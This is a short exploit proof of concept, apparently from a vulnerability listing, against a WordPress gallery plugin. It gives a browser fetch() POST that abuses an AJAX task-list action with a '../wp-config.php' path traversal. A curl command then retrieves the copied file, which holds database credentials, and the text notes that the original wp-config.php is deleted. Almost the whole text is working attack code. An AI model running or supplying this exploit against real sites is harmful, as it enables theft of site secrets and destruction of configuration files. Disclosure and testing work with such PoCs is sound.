## https://sploitus.com/exploit?id=WPEX-ID:5C8473F4-4B52-430B-9140-B81B0A0901DA
1. Create a Gallery called "My Gallery" and note its ID.
2. Run the following code in your browser, replacing ADMIN_USERNAME, ADMIN_PASSWORD, and GALLERY_ID accordingly.
await (await fetch("/index.php", {
"credentials": "include",
"headers": {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
},
"body": 'photocrati_ajax=1&action=enqueue_nextgen_api_task_list&q=ADMIN_USERNAME&z=ADMIN_PASSWORD&app_config={}&task_list=[{"name":"x","type":"gallery_edit","query":{"id":"GALLERY_ID"},"object":{"name":"x","image_list":[{"path":"../wp-config.php","filename":"xxxxxxx.jpg"}]}}]&extra_data={}',
"method": "POST",
"mode": "cors"
})).text();
3. Download the file contents with the following `curl` command:
curl http://SITE_URL/wp-content/gallery/my-gallery/xxxxxxx.jpg
4. Note that the `wp-config.php` file has been deleted.